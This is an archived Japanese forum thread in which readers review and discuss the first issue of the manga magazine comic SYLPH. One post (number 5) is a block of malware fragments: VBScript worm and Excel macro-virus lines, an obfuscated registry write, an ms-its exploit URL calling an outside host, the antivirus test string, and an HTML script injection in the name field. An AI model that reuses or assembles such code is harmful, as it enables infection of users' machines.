2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

comic SYLPH(シルフ) メディアワークス

1 :花と名無しさん:2006/12/13(水) 21:44:53 ID:XJBp26aT0
メディアワークスより新創刊!
新しい少女向け漫画雑誌「comic SYLPH(シルフ)」について
語りましょう!

2 :花と名無しさん:2006/12/13(水) 21:50:49 ID:???0
公式サイト
ttp://www.mediaworks.co.jp/special/sylph/index.php

3 :花と名無しさん:2006/12/13(水) 21:56:01 ID:???0
vol.1 12/9発売

表紙:晴瀬ひろき(リリアとトレイズ)
巻頭カラー:ユイ、316歳(星野リリィ)
リリアとトレイズ(晴瀬ひろき)
クリア・クリア・送信(山名沢湖)
まかないこむすめ(ざちお)
アノニマス-鳥籠(今村陽子)
レベル4(岬下部せすな)
巻中カラー:S・L・Hストレイ・ラブ・ハーツ!(硝音あや)
ビージェネ!Beat Punk Generation(林家志弦)
孤独な王様-LE ROI SOLITUDE(二尋鴇彦)
おまもりのかみさま-まつりのおまもり(小杉繭)
Time After Time(あきばるいき)
ルート2(古名奏子)
お伽噺の少女(斎まや)
従者の学校(松山花子)

次号vol.2は2007年3月10日発売予定!

4 :花と名無しさん:2006/12/13(水) 22:01:06 ID:???0

山名沢湖
ttp://comic6.2ch.net/test/read.cgi/comic/1142071453
林家志弦
ttp://comic6.2ch.net/test/read.cgi/comic/1163558772
松山花子
ttp://comic6.2ch.net/test/read.cgi/comic/1148181553

時雨沢恵一
ttp://book3.2ch.net/test/read.cgi/magazin/1163920337

5 :<body onload=window()>:2006/12/13(水) 22:02:57 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :花と名無しさん:2006/12/13(水) 22:05:52 ID:???0
vol.1 てんぷら。

表紙:
巻頭・ユイ316:
リリトレ:
クリクリ送:
まかない:
アノニマス:
レベル4:
巻中・SLH:
ビージェネ:
孤独王:
おまもり:
TAT:
ルート2:
お伽噺:
従者:

vol.1総評:
次号:

7 :花と名無しさん:2006/12/13(水) 22:07:59 ID:???O
田舎じゃ配本なかったのか、
この雑誌見たことない

8 :花と名無しさん:2006/12/13(水) 22:18:44 ID:???0
おお、>>1乙です。
せっかくだから天婦羅いただきます。

表紙:おためし小冊子と一緒?まあ、看板としてはいいのでは。
巻頭・ユイ316:カラー綺麗ですね。絵が好きなので一般誌に描くのはうれしい。
かわいくていいんでないかな。淡々とした主人公がかわいい。
リリトレ:うーん…今後の展開に期待。原作を読んでいないので。
クリクリ送:思春期だなあ。
まかない:ビームとかにいそうな感じ。なぜ猫耳?
アノニマス:絵がキモイ。特に口元。不必要なエロはいらない。
レベル4:軽い感じ。今のところイマイチ。
巻中・SLH:絵が好みでない。設定がご都合主義すぎ。乙女ゲームなの?これ。
ビージェネ:ボクシングとか格闘技興味ないです。
孤独王:結構好みかも。今後に期待。
おまもり:絵はかわいい。
TAT:読んだはずだけど、どうしても思いだせん。
ルート2:ありがちだけど悪くはないかな。
お伽噺:おお、雰囲気がいい感じ。新人さんかな?今後に期待。
従者:このひとのノリは好みでないのでスルー。

vol.1総評:意外に良かった。乙女ゲーム方面には走らないで欲しい。
次号:買うかな。期待します。前田とも好きだし。

9 :花と名無しさん:2006/12/13(水) 22:32:39 ID:???0
>1
乙です。

>4がちょっとさみしいね…。

10 :花と名無しさん:2006/12/13(水) 22:37:49 ID:???0
マイナー作家ばっかだから?
星野リリィとか岬下部せすなくらいはひょっとしたらスレがあるかと思ったんだけど。
以外にないものね〜

11 :花と名無しさん:2006/12/13(水) 22:41:35 ID:???0
中村明日美子
ttp://comic6.2ch.net/test/read.cgi/comic/1136580572

12 :花と名無しさん:2006/12/13(水) 22:45:51 ID:???O
TAT←泣いてるみたい

13 :花と名無しさん:2006/12/13(水) 22:56:58 ID:???0
ほんとだw
最初羅列のことだってわからなくて、顔文字作成したよー、って言ってんだと思ったよ。

14 :8:2006/12/14(木) 00:23:44 ID:???0
TAT読んだはず、とか書いたけど、確かめてみたら読んでなかった。
最初から全部じゃなくて、開いたところからてきとーに読み進めたら
何か目がすべって読めなかったみたい。
再トライしてみようとしたけど今はムリだった…どうも受け付けないらしい。

15 :花と名無しさん:2006/12/14(木) 02:44:13 ID:???0
天麩羅いただきまつ
新スレ立ったとはいえ過疎ってんなーw

表紙  まぁまぁ。表紙PP加工してくれてて嬉しい
巻頭・ユイ316  よかった。続き気になる。
         Fの連載と世界観似て・・は無いけど何故か被る
リリトレ  原作読んでないけど楽しめた。でも1話でキャラ出すぎ徐々に出して・・
クリクリ送  可愛い・・・けど百合姫寄りな話。
まかない  絵は苦手だけど話は良かった。世界観がわからん
アノニマス  今村さんの漫画好き。
レベル4  どうも苦手・・展開がありえない。イマイチ楽しめない
巻中・SLH  同人作家っぽいなぁ・・
ビージェネ  林家、絵変わった?主人公もうちょっと可愛い方がいい。
       あとギャグのほうがいい
孤独王  ギャグ絵多い・・絵は可愛い
おまもり  同人よりも少女漫画寄りな画面構成に・・
      と言うかこの人居るから買った。
TAT  絵は綺麗。話はイマイチ。
ルート2  どっちがどっちか見分けつかない・・
お伽噺  絵も話も好き。連載じゃないのが残念
従者  文字多い、白い。どうも苦手

vol.1総評:期待度はそんなに高くなかったけど、
好きな作家が多かったから買ってしまった・・
次号:中村さんが描くので買う。でも小冊子イラネ。原作読んでないし。


16 :花と名無しさん:2006/12/14(木) 09:23:06 ID:???0
【エース】角川系漫画総合16冊目【電撃】
http://comic6.2ch.net/test/read.cgi/comic/1160111279/


17 :花と名無しさん:2006/12/14(木) 11:27:19 ID:???0
全般にどうもいまいちだったのですが…。
少女漫画雑誌という位置付けもどうも中途半端だったし。
老舗の少女漫画雑誌に敵うはずが無いからどうしても実験的な方針になってしまうんだろうなぁ。
取り敢えず2号も買ってはみますが。

18 :花と名無しさん:2006/12/14(木) 11:58:09 ID:???0
表紙:やっぱメディアミックス優遇ですか。
リリトレ: 原作既読。まあ原作が小説だけにどうしても描き足りない部分が出るのはともかくとして、
      事前に思ってたよりはよかったと思う。てかコミカライズとしてはかなりいい方か。原作の空気出てるね。
      リリトレよりアリソンが好きな身としては複雑ですが。この出来でアリソンを読みたいなぁ…。
      一話でこのペースってことは「一番長い日」までやるんだろうか。個人的には止めてほしいな。あの話嫌い。
ビージェネ: 露骨に画風変えた絵にまず吹いた。まあ今回ほとんど内容がないから賛否は次号以降かな。
       なんか某シスターレッドの匂いがする悪寒。あと紙面が白いのは何とかしてください。狙ってるんだろうけど。
レベル4: 浮いてる。でもこれはこれで。

vol.1総評:え、これ季刊だったの!?

19 :花と名無しさん:2006/12/14(木) 12:45:35 ID:???0
普段少年誌ばかり読んでて林家、岬下部、松山の3人目的で買ってみたが
この3人はそろって浮いてるなー。楽しめたけど。
逆にここで好かれてるアノニマスとか お伽噺は楽しめなかったが
少女漫画だとこういうノリが主流なの?暗くて読んでて疲れた…

20 :花と名無しさん:2006/12/14(木) 14:14:18 ID:???O
創刊おめでとage!
つか、このスレッドで初めて知ったので、今度本屋で探してみよ〜

21 :花と名無しさん:2006/12/14(木) 18:29:54 ID:???0
しばらくageていいかな。人少ないし。

アノニマス、好評か?
羅列まだ少ないけど、嫌いっつってるひともいんじゃん。
俺も嫌いだけどな。
口元がキモイにドウイ。
あと、無駄な設定多すぎ。なにあの武闘メイド。
あっさり殺しすぎだし、説明不足。ムネの大きさは趣味かね?

22 :花と名無しさん:2006/12/14(木) 18:53:13 ID:???0
表紙: かわいい。見栄えする。少女系かどうかはともかく。
巻頭・ユイ316: 主人公のボンヤリした感じがいい。続き読みたい。
リリトレ: 原作未読。お試し冊子ではどうなるかと思ったが後半持ち直した。車中のやりとりが面白かった。
クリクリ送: 可も不可もなし。空気漫画っぽい。
まかない: ドン臭い絵柄だが話は面白かった。
アノニマス: 雰囲気漫画?壮大な話のダイジェストを読まされたような。絵はきれい。
レベル4: 苦手な絵柄だけど読めた。ショタな主人公がかわいい。
巻中・SLH: 紙面がうるさすぎて目がすべり読めなかった…
ビージェネ: 面白くなりそうだが季刊でこの展開の遅さはどうかと。
孤独王: 神父とか吸血鬼とかおなかいっぱい。絵は好みなので次号に期待。
おまもり: 今号ベスト。親しみやすい絵で話もまとまってた。まとまりすぎて読みきりかと思ったが続くようでうれしい。
TAT: 良くも悪くも電撃。大王に載せた方がよかったのでは。
ルート2: そつなく上手いがキャラが全部同じ顔に見えて混乱した。
お伽噺: 地味だが独特の世界観があってよかった。
従者: せっかくの美形キャラなんだからもう少し丁寧に描けばいいのに。

vol.1総評: ラブ分控えめな漫画が多くて好み。ちとおとなしめ?4コマ欲しい。
次号:唐花見コウの漫画が読んでみたいので買う。付録は小説に興味。

23 :花と名無しさん:2006/12/14(木) 23:05:21 ID:???0
リリトレの小冊子つけて釣れる読者って男だけな気がするが
この雑誌はどの辺をターゲット層にしてるんだかわかんないな…。少女誌だよな?一応…


24 :花と名無しさん:2006/12/14(木) 23:57:13 ID:???0
電撃に少女レーベルがないからなー。
リリトレファンを集めて雑誌が定着するならそれもまたアリ。

25 :花と名無しさん:2006/12/14(木) 23:57:53 ID:???0
おっと。あげあげ

26 :花と名無しさん:2006/12/15(金) 00:22:03 ID:jEiQyU6A0
目指す方向は花ゆめ系だって人づてに聞いたけど、
今の状態じゃ悪い意味で男性向け癖の強い雑誌だよな。
リリトレのイラストの人やレベル4の人やTATの人は
やっぱり絵が少女漫画と違う気がするんだよな〜
特にリリトレみたいな表情の乏しいイラストは少女漫画には致命的なんじゃ…


27 :花と名無しさん:2006/12/15(金) 00:31:53 ID:???0
花ゆめ系目指すのは良いんだけど(新書館系目指されるよりは)、
今の花ゆめはつまらんので、一昔前の花ゆめ系を目指して欲しい…
ところで、コンセプトであったはずのかわカッコイイ女の子ってのは
どれですかいね?リリア?お伽噺?ビージェネ?

28 :花と名無しさん:2006/12/15(金) 00:51:54 ID:???0
え〜?コンセプトが「可愛&カッコイイ」の融合なら、
花ゆめ全然違うじゃん。
80〜90年代の花ゆめ黄金期辺りだと、少女にこだわらない
ホラーやBLもありーの、動物のお医者さんみたいなおとぼけありー、
赤僕のお涙系だの、何でも混在漫画ですよ。
だから当時はリア少年〜青年漫画好きも読者だったし。

29 :花と名無しさん:2006/12/15(金) 09:46:10 ID:???0
レベル4の人やTATの人の絵柄は角川のアスカ系だと違和感なさそう。
花ゆめ系といわれると違うけど。

30 :花と名無しさん:2006/12/15(金) 11:55:00 ID:???0
スレ立ってたの気づかなかったよ。
>27さんと同じかわかっこいいって期待したのに、どれをさしてるのか・・・。

ちなみに近所の本屋では少年・青年誌コーナーに置かれてた。

31 :花と名無しさん:2006/12/15(金) 14:06:09 ID:???0
シルフのコンセプトっていうか目的は
「少女漫画読まない男性を少女漫画に引き込むこと」にあるんじゃね?
なんかマリみてがコバルトの新規読者層を手に入れたみたいに。
だとしたらとんでもなく難しい気がするが。

32 :花と名無しさん:2006/12/15(金) 22:14:05 ID:???O
まだまだ駆け出しって感じだけど
恋愛至上主義にも男性向けサービスにも特化しておらず、好感。
いずれ月刊化して、末長く続いて欲しいな、なんて。
既成の少女漫画誌って
恋愛至上主義かエロかホモか少女誌を装ったバリバリ男性向け
(ステン◯ル、コミ◯イ、ア◯ーズライト…)のどれかだったから
こういうマターリした枠組みは欲しい。アニメ絵自体はラブだし。

33 :花と名無しさん:2006/12/16(土) 10:49:16 ID:???O
コミティアって創作同人即売会で声をかけまくってるから同人系からかなり流れてくるよ
少女漫画雑誌というよりも創作同人な雑誌になると思う
ミギー系、森薫系の作風の作家が多くなるらしい

34 :花と名無しさん:2006/12/16(土) 12:42:26 ID:???0
少女漫画寄りのサブカル雑誌だったら他に無いから面白いかも。
アフタやIKKIやビームより少女漫画テイスト強めな漫画とか。
…電撃系では無理か

>>33
それ本当?
今の執筆陣は善くも悪くも電撃テイストだけど
ゆくゆくはそっち系に作家も入れ替わって行くってこと?
それならそういうの好きなんで応援したいな

35 :花と名無しさん:2006/12/16(土) 14:27:17 ID:???O
本当

ここ最近のコミティアでスカウトされた人がかなりいる
コミックグランプリに応募するように働きかけたりもしていたよ
だから今回の受賞者はコミティア系の作家が目立つかも

コミティア創作系は目の付けどころがいいよね
オリジナル漫画をきちんと描ける即戦力が多いし
似た雑誌も少ない

36 :花と名無しさん:2006/12/16(土) 14:38:02 ID:???0
同人から引っ張ってくるのは電撃のお家芸だしなぁ。
でもエロパロじゃなく創作系からってのは珍しい…かな。

37 :花と名無しさん:2006/12/16(土) 17:15:21 ID:???0
コミティア系かー。オリジナル書いてた人ならそれもありだよね。
版権同人やってた人は絵だけとか設定作れない人ってイメージだから、
正直いらないけど。
コミティアとかそっち系の出の人好きな人結構いるから、期待。
前に出てる森薫・ミギーも好きだし、ビームで書いてる入江亜季も好き。

羅列少ないなー。今何人いるんだ、ここ。

38 :花と名無しさん:2006/12/16(土) 20:02:57 ID:???0
一度スルーして良く考えると単行本化されないのが多そうだから
買っておこうと思って本屋に行ったんだけど
5冊くらいあったのが全部なくなってたよ。
案外売れてるのかな。

39 :花と名無しさん:2006/12/16(土) 20:59:17 ID:???0
売れないと発売日の翌日でも容赦なく返品。

40 :花と名無しさん:2006/12/16(土) 21:55:30 ID:???0
それはない。
新創刊なのに一日で返品とかありえないね。無能。

41 :花と名無しさん:2006/12/16(土) 23:05:52 ID:???0
逆だよ。初物は発売日が一番出る。

42 :花と名無しさん:2006/12/16(土) 23:23:26 ID:???0
なにが逆?意味がわからないんだけど。
初物は発売日がいちばん出るから、発売日に売れなかったら返品するって意味?
それは店にもよると思うけど。
実際自分は発売2日後に買ってるよ?

43 :花と名無しさん:2006/12/17(日) 01:46:26 ID:???0
実際今回もコミティア出の方は何人かいるみたいだね

44 :花と名無しさん:2006/12/18(月) 21:39:09 ID:???0
>>31
>「少女漫画読まない男性を少女漫画に引き込むこと」にあるんじゃね?

それはホントにとんでもなく難しいな
だいたい少女漫画読まない男って少女漫画に偏見持ってる奴が多いだろ

45 :花と名無しさん:2006/12/19(火) 09:31:19 ID:???O
少女漫画を読まない男女も追加

最近少女漫画に戻って来た身としては、読まない時期は
平凡な少女がイケメンオンリーにモテモテなのが萎え
(もっと性的な意味でロリフェイスおっぱい尻強調しろ)
絵に肉感やスピード感がなくて貧弱なのが萎え
男キャラの「ほーら格好いいでしょー恋愛してみたいでしょー」
ってバックアップが萎え(少年漫画はヒロインスルー気味なのに)
コミックスの装飾がみんな似ててイマイチ
(ジャンプコミックスみたいに背表紙とか凝れ)
需要のあるあーみん新井小坂系キチガイギャグや少女漫画原作アニメが少ないのが萎え
リアル流行に右習えなのが萎え
って感じだった。小学校低学年までは普通に楽しめたけど。

46 :花と名無しさん:2006/12/22(金) 18:06:00 ID:???0
王家の紋章は面白かった

47 :花と名無しさん:2006/12/22(金) 18:14:44 ID:???0
……………そうか、よかったな。

48 :花と名無しさん:2006/12/23(土) 11:27:44 ID:???0
576 名無しんぼ@お腹いっぱい sage 2006/12/23(土) 10:40:31 ID:WzuCldaj0
総論としては微妙? てゆか「俺には微妙」?
 ブラッドの駄目さは一号で見切るに値したと思いますが、こっちは「ダメじゃないんだけど良さが俺には判らない」という。もっと簡単に云うと(コミックハイみたいに男性向けローカライズしていない)少女漫画。
 こういう「水準は低くなさげだが方向性が違う」というのは評価&扱いが困るんだよにゃー……。

49 :花と名無しさん:2006/12/25(月) 16:37:17 ID:???0
ハイ・アワプラときてコレなわけだが
狙ってる市場が一番小さそうだなぁ

50 :花と名無しさん:2006/12/25(月) 18:29:04 ID:???0
創刊前に広告部が出した広告主向けチラシより(現在はググれば見れる)

『恋愛コミックでも、レディースコミックでも、BL(ボーイズラブ)コミックでもありません。
10〜20代の女の子が「かわいい!」「カッコいい!」と思わず興味を惹かれる、
個性的なキャラクターとストーリーが中心のコミック誌なのです。
(中略)「電撃文庫」からのコミカライズや、人気プロ作家の意外な作品・作風を
じっくり読めるのはSYLPHだけ!
さらにイベント出身作家の起用で、マンガ家やイラストレーター志望など
「クリエイター志向」が強い読者へのアピールも充分な媒体です。』

51 :花と名無しさん:2006/12/26(火) 02:47:06 ID:???0
とりあえず買って来て、いくつか読んだ。
それなりに面白いと思うし、多分残りも楽しめるだろうとは思ったが、

続きを数ヶ月待てというのがキツすぎる。
早く読ませろ馬鹿、という意味と、数ヶ月後の発売日にはこの雑誌の存在忘れてるよ、という意味で。

52 :花と名無しさん:2006/12/26(火) 04:14:40 ID:???0
自分的にはいい発行ペースだけど
連載モノは確実に先月の内容忘れてそう。
基本一話完結っぽいだけど。

SLHはキャラの名前が厨のペンネームみたいだな…

53 :花と名無しさん:2006/12/27(水) 16:51:26 ID:???0
>>50
恋愛コミック、レディースコミック、BL(ボーイズラブ)コミック
以外の女性向けカテゴリは欲しいと思ってた。
かのステンシル(ブレイド)は女の子は可愛いけど男キャラが受け身な奴ばっかだったから、
男女の魅力のバランスがいいのが読みたい。
あと、落とす奴が多いからイベント出身作家の起用中心は止めて欲しい…

54 :花と名無しさん:2006/12/28(木) 12:49:40 ID:???0
やっぱSLHはおもしれーな。
作画も安定してるしキャラもスゲー萌えるしストーリーもオリジナリティに溢れててぐいぐい引き込まれる。
なんつーか華があるよね華が。他の作品とは一線を画すっつーか。


55 :花と名無しさん:2006/12/28(木) 16:48:32 ID:???0
なんと分りやすい釣り

56 :花と名無しさん:2006/12/28(木) 21:50:52 ID:???0
>>54
作品名(又は誌名)だけ入れ替えた同書き込みが各スレで蔓延中

57 :花と名無しさん:2006/12/29(金) 10:08:42 ID:???0
このおにぎり、塩加減最高!

58 :花と名無しさん:2006/12/30(土) 22:52:47 ID:???0
ひょっとしてこのスレ男しかいないんじゃ…

59 :花と名無しさん:2006/12/31(日) 00:40:48 ID:???0
立てた私が女ですがなにか?

60 :花と名無しさん:2007/01/05(金) 14:07:23 ID:DplxYA28O
季刊ってことだから単行本一冊分まとまるのはだいぶ先だろうけど、シルフコミックスみたいな独自レーベルを立ち上げるのかな?
(そんな先までこの雑誌がもつかよってツッコミ入りそうwww)
電撃コミックスでは青年・少年コーナーに置かれてしまうだろうし、どうするのかしらん?


61 :花と名無しさん:2007/01/06(土) 10:51:43 ID:???0
男も読んでるし別にどっちでもいいんでは?

62 :花と名無しさん:2007/01/06(土) 21:28:37 ID:???0
おそらくコミックスが出るとしたら電撃系だしB6になるのじゃないかと予想
するのだが、少女系でその大きさで出すと、ホモにまぎれる可能性があるな。
あとは新書館とか…マイナー系のB6は整理されていない店も多いから、
見つけられにくくなる可能性があるかも。
それともA5で出るかも?そうしてもA5の女性向けだとレディースが強いから、
埋もれてしまうしなあ。
新書サイズで出して、秋田角川白泉あたりに置くのが一番タゲ的には
良さげだろうか。

63 :花と名無しさん:2007/01/07(日) 14:21:18 ID:???0
一迅社とかスクエニの隣あたりが妥当かな〜
どっちも棚の位置が本屋によってまちまちなのではしごしてると探すのに苦労する

64 :花と名無しさん:2007/01/07(日) 18:25:53 ID:4u44G0MA0
  
  摂氏骨



  Э=Э




65 :花と名無しさん:2007/01/07(日) 18:55:00 ID:???0
はねむすの人が書いてるんだ
はねむすの続き書いてほしいんだけどね

66 :花と名無しさん:2007/01/08(月) 11:40:21 ID:WrxUC3HEO
昨日買ってみた
まだ全部は読んでないけど…
知らない作家ばっかだなぁ。
絵がうまい作家とヘタレな作家の差が激しい。
でもそんなにオタくさくないしBL臭もしないんで
その点では好感。
個人的にメディアミックスばかりの雑誌は嫌いなんで、そんなんばっかになったら
買うの止める。でもそうなっちまう予感。

67 :花と名無しさん:2007/01/08(月) 12:18:05 ID:???0
公式の作家紹介まともな人間がいねえw
ttp://www.mediaworks.co.jp/special/sylph/latest_issue/index.php

68 :花と名無しさん:2007/01/08(月) 16:13:41 ID:???0
たしかに人がいない

69 :花と名無しさん:2007/01/08(月) 16:30:13 ID:???0
山名さんと古名さんは見たことあるがふつうの人だったよ

70 :花と名無しさん:2007/01/09(火) 19:31:19 ID:???0
いや絵の通りのキャラだったら逆に困るからw

71 :花と名無しさん:2007/01/10(水) 21:41:40 ID:???0
サイン会行って目の前にイカが座ってたらどうリアクションしていいか困るしな

72 :花と名無しさん:2007/01/10(水) 23:52:45 ID:???0
SLH最強説急浮上

73 :花と名無しさん:2007/01/18(木) 11:45:59 ID:???0
こらっ ドキドキしすぎだぞっ ポンコツハートっ

74 :花と名無しさん:2007/01/18(木) 17:01:33 ID:???O
SLHは神の作品

75 :花と名無しさん:2007/01/18(木) 17:05:47 ID:???O
禿げ同
雲出華陰様に抱かれたい

76 :花と名無しさん:2007/01/18(木) 17:14:33 ID:???O
俺は冷泉久我がいいな

77 :花と名無しさん:2007/01/18(木) 17:17:23 ID:???O
飛鳥井聖キュンハァハァ

78 :花と名無しさん:2007/01/18(木) 17:20:54 ID:???O
野生司恋雪のオトナの魅力にはかなわんよ

79 :花と名無しさん:2007/01/18(木) 17:23:24 ID:???O
山科岑満の知的でミステリアスな雰囲気にイチコロだぜ

80 :花と名無しさん:2007/01/18(木) 17:24:42 ID:???O
いやいや最強はイケメン二宮季遠だろ

81 :花と名無しさん:2007/01/18(木) 17:26:40 ID:???O
壱河漣のスマイルにはさすがのあたしも一目惚れ

82 :花と名無しさん:2007/01/18(木) 17:52:39 ID:???0
確かに硝音あやの作品は別格で抜けてるよな
山名とかが霞んで見える

83 :花と名無しさん:2007/01/18(木) 18:40:07 ID:???0
どうでもいいけど全部携帯であからさますぎてワロス

84 :花と名無しさん:2007/01/18(木) 19:02:36 ID:???O
>>76
アッー!

85 :花と名無しさん:2007/01/18(木) 19:04:12 ID:???0
急に伸びたと思ったらワロス
にしても凄い字面だな。ペンネームかよ

86 :花と名無しさん:2007/01/18(木) 19:28:45 ID:???0
>>85
× ペンネーム
○ 中二病のペンネーム

87 :花と名無しさん:2007/01/18(木) 19:45:03 ID:???0
やっと読んだけど名前じゃなく外見で覚えることにした。

88 :花と名無しさん:2007/01/18(木) 20:01:40 ID:???0
SLHみたいな個性のある作品は違う意味で楽しめるよな
そつなくまとまっただけの作品よりかよっぽどいい

89 :花と名無しさん:2007/01/18(木) 20:11:59 ID:???0
少し前の少女漫画雑誌ってほとんどのところがこんな感じでごった煮だったのにね
SLHはファンタジー要素多いけどいろいろ読めるのがいい

90 :花と名無しさん:2007/01/18(木) 20:36:32 ID:???0
89のSLHってSYLPHの略のこと??

91 :花と名無しさん:2007/01/18(木) 22:04:50 ID:???0
3 名前:花と名無しさん[sage] 投稿日:2006/12/13(水) 21:56:01 ID:???0
vol.1 12/9発売

表紙:晴瀬ひろき(リリアとトレイズ)
巻頭カラー:ユイ、316歳(星野リリィ)
リリアとトレイズ(晴瀬ひろき)
クリア・クリア・送信(山名沢湖)
まかないこむすめ(ざちお)
アノニマス-鳥籠(今村陽子)
レベル4(岬下部せすな)
巻中カラー:S・L・Hストレイ・ラブ・ハーツ!(硝音あや)
ビージェネ!Beat Punk Generation(林家志弦)
孤独な王様-LE ROI SOLITUDE(二尋鴇彦)
おまもりのかみさま-まつりのおまもり(小杉繭)
Time After Time(あきばるいき)
ルート2(古名奏子)
お伽噺の少女(斎まや)
従者の学校(松山花子)

92 :花と名無しさん:2007/01/18(木) 23:03:31 ID:???O
結局どの作品が一番人気なの?

93 :花と名無しさん:2007/01/19(金) 01:08:04 ID:???O
SLHの作者、癌駄無種の同人作家かよ…この人嫌いなんだよな(つω⊂)

こらっ
ドキドキしすぎだぞっ
ポンコツハートッ

ワロタ(つω⊂)wwwwww

94 :花と名無しさん:2007/01/20(土) 10:32:40 ID:???0
>>92
創刊号でどれが人気とか答えようがねーよこのポンコツハートッ!

強いて言えば原作のあるリリトレか、
他作品が有名?なビージェネあたりじゃないかな。

95 :花と名無しさん:2007/01/23(火) 14:16:35 ID:???O
ビージェネ
ビーパン
パンジェネ
定着するのはどれだろうな

96 :花と名無しさん:2007/01/23(火) 19:09:15 ID:???O
俺はパンジェネを推す

25 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)